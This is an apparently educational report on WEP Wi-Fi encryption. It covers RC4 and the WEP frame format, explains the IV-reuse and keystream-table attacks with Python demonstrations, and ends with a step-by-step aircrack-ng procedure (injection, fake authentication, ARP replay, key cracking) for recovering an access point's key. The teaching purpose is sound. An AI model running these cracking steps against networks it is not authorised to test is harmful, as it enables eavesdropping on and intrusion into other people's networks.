
Wired Equivalent Privacy (WEP)

1 How does it work?


WEP uses the RC4 (Rivest Cipher 4) stream cipher. It was the original security mechanism
for IEEE 802.11 wireless networks (Wi-Fi). The cipher encrypts every packet before it is
sent over the air, and the receiving station decrypts each packet before the user can read
the information in it. The encryption is a symmetric-key algorithm, meaning that encryption
and decryption use the same key to turn the message (plaintext) into ciphertext and back
(balaji, 2006).

2 Encryption Method
2.1 RC4 Encryption Method (balaji, 2006)

Figure 2-1: Diagram for RC4 encryption technique

WEP uses 64-bit or 128-bit key sizes (the 128-bit variant was added later by vendors), and
both use a 24-bit IV (initialisation vector) that is transmitted in the clear with every
packet. Subtracting the IV leaves a 40-bit secret key (equivalent to 5 ASCII characters) in
the 64-bit mode and a 104-bit secret key (equivalent to 13 ASCII characters) in the 128-bit
mode.

Based on the diagram, the step-by-step encryption method for WEP is:

1. The sender has a packet to transmit over a wireless network with WEP protection.
2. Before the packet is sent, the sender chooses a 24-bit IV and prepends it to the secret
key (the access point password) to form the per-packet RC4 key, which is fed into the
RC4 process to generate a keystream.
3. The RC4 process consists of two algorithms, the KSA (Key Scheduling Algorithm) and
the PRGA (Pseudo Random Generation Algorithm).
4. The KSA uses the per-packet key (IV followed by the secret key) to scramble an array
of the 256 byte values into a key-dependent permutation.
5. The IV is chosen by the sending station, typically as a counter or a random number,
and is sent unencrypted so that the receiver can rebuild the same per-packet key.
6. The PRGA walks the permutation to generate a keystream, which is XORed with the
plaintext (to which a CRC-32 integrity check value has been appended); the result is the
encrypted text.
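The Python code below is an added example of the six steps above; it is not code from the cited source. It implements RC4's KSA and PRGA, then builds a WEP frame body the way the protocol does: a 3-byte IV in the clear, followed by RC4 (keyed with IV || secret key) over the plaintext plus its CRC-32 integrity check value. The 5-byte key and the IV used in the usage lines are made-up sample values.

```python
import struct
import zlib

IV_LEN = 3  # WEP prepends a 24-bit IV (3 bytes) to the secret key


def rc4_ksa(key: bytes) -> list:
    """Key Scheduling Algorithm: scramble 0..255 into a key-dependent permutation S."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_prga(S: list, n: int) -> bytes:
    """Pseudo Random Generation Algorithm: walk the permutation to emit n keystream bytes."""
    S = S[:]  # work on a copy so the caller's permutation is left intact
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: XOR data with the keystream. Encryption and decryption are the same operation."""
    keystream = rc4_prga(rc4_ksa(key), len(data))
    return bytes(a ^ b for a, b in zip(data, keystream))


def wep_encrypt(secret_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: IV (clear) || RC4_{IV || secret_key}(plaintext || CRC-32 ICV)."""
    assert len(iv) == IV_LEN
    assert len(secret_key) in (5, 13)  # 40-bit ("64-bit WEP") or 104-bit ("128-bit WEP")
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    return iv + rc4(iv + secret_key, plaintext + icv)


def wep_decrypt(secret_key: bytes, frame: bytes) -> bytes:
    """Rebuild the per-packet key from the clear IV, strip and verify the ICV."""
    iv, body = frame[:IV_LEN], frame[IV_LEN:]
    decrypted = rc4(iv + secret_key, body)
    plaintext, icv = decrypted[:-4], decrypted[-4:]
    if struct.unpack("<I", icv)[0] != (zlib.crc32(plaintext) & 0xFFFFFFFF):
        raise ValueError("ICV check failed: frame corrupted or wrong key")
    return plaintext


if __name__ == "__main__":
    key = b"\x12\x34\x56\x78\x90"   # sample 40-bit key (constructed for the example)
    iv = b"\x00\x00\x01"            # sample IV, as a counter-style sender would pick it
    frame = wep_encrypt(key, iv, b"hello")
    print(frame.hex())
    print(wep_decrypt(key, frame))
```

The IV is the only part of the frame body that is not XORed with the keystream; the receiver needs it to run the same KSA, which is exactly why it can also be read by an eavesdropper.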

3 WEP Security Level


WEP has been considered weak since 2001. The story began when three researchers at the
University of California, Berkeley (Borisov, Goldberg and Wagner) published a summary
titled "Security of the WEP algorithm" describing serious flaws in WEP, including the
following:

3.1 Passive attacks to decrypt traffic based on statistical analysis.


This attack only listens. Because the 24-bit IV is sent in the clear and the keystream
depends only on the IV and the secret key, every packet that reuses an IV reuses the
keystream. XORing two such ciphertexts cancels the keystream and leaves the XOR of the two
plaintexts; if one plaintext is known or guessable (802.11 data frames start with a fixed
LLC/SNAP header), the keystream and the other plaintext follow. With only 2^24 possible
IVs, and with some cards resetting the IV to zero on start-up, repeats appear quickly on a
busy network, so the more packets the attacker captures, the more keystream is recovered.

Once the secret key itself is recovered, the attacker can eavesdrop on all traffic or
inject and modify frames. Fluhrer, Mantin and Shamir showed that the key can be
rederived from the first keystream byte of many packets with relatively little work: for
certain "weak" IVs the first RC4 output byte leaks one byte of the secret key with a
probability of about 5%, and since the first plaintext byte is known, the attacker
collects votes for each key byte over many packets (Fluhrer, Mantin, & Shamir, 2001).

3.2 Dictionary-building attack that, after analysis of about a day’s worth of
traffic, allows real-time automated decryption of all traffic.
The "dictionary" here is not a list of passwords but a table of keystreams indexed by
IV. Every captured packet whose plaintext is known (or recovered as in 3.1) yields the
keystream for its IV, which is stored. Since there are only 2^24 (about 16.7 million)
IVs and a frame is at most about 1500 bytes, the complete table is on the order of tens
of gigabytes, and on a busy network it can be filled from about a day's worth of traffic.

Once the table is built, no key recovery is needed: for every further packet the attacker
looks up the IV, XORs the stored keystream with the ciphertext and reads the plaintext
immediately, which is what makes the decryption real-time and automated. Note that the
weakness is the small IV space and the resulting keystream reuse, not the key length;
brute-forcing a 104-bit RC4 key is infeasible.
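The following Python code is an added example illustrating both 3.1 (keystream reuse under a repeated IV) and 3.2 (the IV-indexed keystream table); it is not from the cited sources. A SHA-256-based function stands in for RC4's per-packet keystream, since neither attack depends on RC4 internals, only on the keystream being a deterministic function of IV || key. The 8-byte LLC/SNAP header used as known plaintext, the key, the IVs and the frame contents are constructed sample values.

```python
import hashlib
import math

IV_LEN = 3
IV_BITS = 8 * IV_LEN
# LLC/SNAP header that begins an IPv4 frame body; used as the known plaintext prefix (assumed sample value).
SNAP_HEADER = bytes.fromhex("aaaa030000000800")


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def toy_keystream(secret_key: bytes, iv: bytes, n: int) -> bytes:
    """Stand-in for the RC4 keystream (NOT RC4): deterministic in IV || key, which is all the attacks need."""
    out = b""
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(iv + secret_key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:n]


def encrypt_frame(secret_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body as the protocol sends it: clear IV followed by plaintext XOR keystream."""
    return iv + xor(plaintext, toy_keystream(secret_key, iv, len(plaintext)))


def recover_from_reuse(frame_a: bytes, known_plaintext_a: bytes, frame_b: bytes) -> bytes:
    """Section 3.1: two frames under one IV share a keystream, so C_a ^ C_b = P_a ^ P_b.
    Knowing P_a (or a prefix of it) reveals the keystream, which decrypts frame_b."""
    assert frame_a[:IV_LEN] == frame_b[:IV_LEN], "attack needs a repeated IV"
    keystream = xor(frame_a[IV_LEN:], known_plaintext_a)
    return xor(frame_b[IV_LEN:], keystream)


class KeystreamDictionary:
    """Section 3.2: IV -> keystream table. Filled from frames with known plaintext;
    once an IV is learned, every later frame under that IV decrypts by a single lookup."""

    def __init__(self):
        self.table = {}

    def learn(self, frame: bytes, known_plaintext: bytes) -> None:
        iv = frame[:IV_LEN]
        keystream = xor(frame[IV_LEN:IV_LEN + len(known_plaintext)], known_plaintext)
        if len(keystream) > len(self.table.get(iv, b"")):  # keep the longest prefix seen
            self.table[iv] = keystream

    def decrypt(self, frame: bytes):
        iv = frame[:IV_LEN]
        keystream = self.table.get(iv)
        if keystream is None or len(keystream) < len(frame) - IV_LEN:
            return None  # IV not learned yet, or not enough keystream for this frame
        return xor(frame[IV_LEN:], keystream)


def expected_frames_until_iv_repeat(iv_bits: int = IV_BITS) -> float:
    """Birthday bound: with random IVs the first repeat is expected after ~sqrt(pi/2 * 2^n) frames."""
    return math.sqrt(math.pi / 2 * 2 ** iv_bits)


def full_table_size_bytes(max_frame: int = 1500, iv_bits: int = IV_BITS) -> int:
    """Storage for a keystream of max_frame bytes per IV: the 'dictionary' of 3.2."""
    return 2 ** iv_bits * max_frame


if __name__ == "__main__":
    key = b"\x01\x02\x03\x04\x05"        # sample 40-bit key (constructed)
    iv = b"\x00\x00\x2a"                 # an IV the sender happens to reuse (constructed)
    p_a = SNAP_HEADER + b"GET /index."   # frame whose plaintext the attacker knows
    p_b = SNAP_HEADER + b"PASSWORD=hu"   # frame the attacker wants to read
    f_a, f_b = encrypt_frame(key, iv, p_a), encrypt_frame(key, iv, p_b)
    print(recover_from_reuse(f_a, p_a, f_b))
    print(int(expected_frames_until_iv_repeat()), "frames to first random-IV repeat")
    print(full_table_size_bytes() / 1e9, "GB for the complete table")
```

`recover_from_reuse` is the per-collision version of the attack; `KeystreamDictionary` is what it becomes when the attacker keeps every recovered keystream and waits for the table to fill.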

4 Compromising WEP Security


4.1 aircrack-ng (‘simple_wep_crack [Aircrack-ng]’, 2010)
There are several ways to compromise a WEP-protected access point or wireless network; one
of them is the aircrack-ng suite. aircrack-ng is a free and open-source set of wireless
auditing tools. The injection steps below rely on Linux wireless drivers, so the
procedure is described for Linux. To start, the following are needed:

- A wireless card whose driver supports monitor mode and packet injection (the referenced
tutorial uses an Atheros card with the madwifi-ng driver, hence the ath0 and wifi0
interface names below).
- A Linux operating system.
- aircrack-ng installed; otherwise get it from https://www.aircrack-ng.org

These are the steps to compromise the security of a WEP-based access point:

1. Open a Linux terminal and run the following commands in order.
2. airmon-ng stop ath0
a. Stops the existing managed-mode interface.
3. airmon-ng start wifi0 9
a. Starts a monitor-mode interface on channel 9, the channel of the target network.
4. aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0
a. -9 means injection test
b. -e teddy is the wireless network name
c. -a 00:14:6C:7E:40:80 is the access point MAC address
d. ath0 is the wireless interface name
5. Wait until the last line of the terminal output reaches 100% (for example "09:23:39
30/30: 100%"), then proceed to the next command.
6. airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0
a. -c 9 is the channel of the wireless network
b. --bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminates
extraneous traffic.
c. -w output is the file name prefix for the files that will contain the IVs.
d. ath0 is the interface name.
Leave this running in its own terminal; the following commands go in a second one.
7. aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
a. -1 means fake authentication
b. 0 is the reassociation timing in seconds
c. -e teddy is the wireless network name
d. -a 00:14:6C:7E:40:80 is the access point MAC address
e. -h 00:0F:B5:88:AC:82 is our card's MAC address
f. ath0 is the wireless interface name
8. aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
a. -3 means ARP request replay: the tool waits for an ARP request and re-injects it
repeatedly, so the access point answers with many new packets, each carrying a
fresh IV.
b. -b 00:14:6C:7E:40:80 is the access point MAC address
c. -h 00:0F:B5:88:AC:82 is our card's MAC address
9. aircrack-ng -b 00:14:6C:7E:40:80 output*.cap
a. -b 00:14:6C:7E:40:80 selects the one access point we are interested in.
This is optional since when we originally captured the data, we applied
a filter to only capture data for this one AP.
b. output*.cap selects all files starting with "output" and ending in ".cap".
10. The key should now be shown in the terminal (for example "KEY FOUND!
[ 12:34:56:78:90 ]") together with a probability (for example "Probability: 98%")
that it matches the access point key. aircrack-ng needs enough distinct IVs in the
capture (on the order of tens of thousands with its default PTW method, many more
with the older statistical method); if the key is not found, keep steps 6 and 8
running to collect more IVs and rerun step 9.

5 References

balaji. (2006, December 27). Wireless Security - How WEP works. Retrieved 26 April 2018,
from https://www.paladion.net/blogs/wireless-security-how-wep-works

Fluhrer, S., Mantin, I., & Shamir, A. (2001). Weaknesses in the Key Scheduling Algorithm
of RC4. In S. Vaudenay & A. M. Youssef (Eds.), Selected Areas in Cryptography (Vol. 2259,
pp. 1–24). Berlin, Heidelberg: Springer. https://doi.org/10.1007/3-540-45537-X_1

simple_wep_crack [Aircrack-ng]. (2010, January 11). Retrieved 26 April 2018, from
https://www.aircrack-ng.org/doku.php?id=simple_wep_crack
